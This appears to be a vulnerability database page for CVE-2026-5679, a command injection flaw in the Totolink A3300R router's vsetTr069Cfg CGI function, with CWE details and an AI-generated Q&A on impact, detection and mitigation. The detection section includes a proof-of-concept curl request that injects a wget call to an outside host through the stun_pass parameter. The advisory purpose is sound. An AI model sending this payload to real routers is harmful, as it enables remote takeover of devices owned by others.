CVE-2026-5679
OS Command Injection in Totolink A3300R vsetTr069Cfg Function
Publication date: 2026-04-06
Last updated on: 2026-04-29
Assigner: VulDB
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| totolink | a3300r | 17.0.0cu.557_b20221024 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-77 | The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component. |
| CWE-78 | The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-5679 is a command injection vulnerability in the Totolink A3300R router firmware version 17.0.0cu.557_B20221024. It exists in the function vsetTr069Cfg within the /cgi-bin/cstecgi.cgi file. The vulnerability occurs because the parameter "stun_pass" from incoming requests is unsafely concatenated into a command string and executed by the router's system function. An attacker can send a specially crafted POST request with malicious shell commands in the "stun_pass" parameter, which the router executes, allowing arbitrary command execution.
This means an attacker can run any command on the router with the privileges of the web service, potentially leading to full device compromise.
How can this vulnerability impact me? :
This vulnerability can allow an attacker to execute arbitrary commands on the affected router remotely. This can lead to full compromise of the device, including unauthorized access, control over network traffic, installation of malicious software, or use of the router as a pivot point for further attacks within the network.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by monitoring for suspicious POST requests sent to the endpoint /cgi-bin/cstecgi.cgi containing the parameter "stun_pass" with unusual or suspicious values that may include shell command injections.
A practical detection method is to capture and analyze HTTP POST traffic targeting /cgi-bin/cstecgi.cgi and inspect the "stun_pass" parameter for injected commands or unexpected payloads.
For example, you can use the following curl command to test if the device is vulnerable by sending a crafted POST request with a suspicious "stun_pass" value:
- curl -X POST http://[router_ip]/cgi-bin/cstecgi.cgi -H "Content-Type: application/json" -d '{"stun_pass":"4343$(wget 192.168.6.1:8888/testpoc)"}'
Additionally, network intrusion detection systems (NIDS) can be configured to alert on POST requests to /cgi-bin/cstecgi.cgi containing the "stun_pass" parameter with suspicious shell command patterns.
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include restricting access to the vulnerable endpoint /cgi-bin/cstecgi.cgi to trusted networks or IP addresses only, to prevent unauthorized exploitation.
If possible, disable or block POST requests to /cgi-bin/cstecgi.cgi until a patch or firmware update is applied.
Monitor network traffic for suspicious POST requests containing the "stun_pass" parameter and block or alert on such attempts.
Contact the vendor or check for firmware updates that address this vulnerability and apply them as soon as they become available.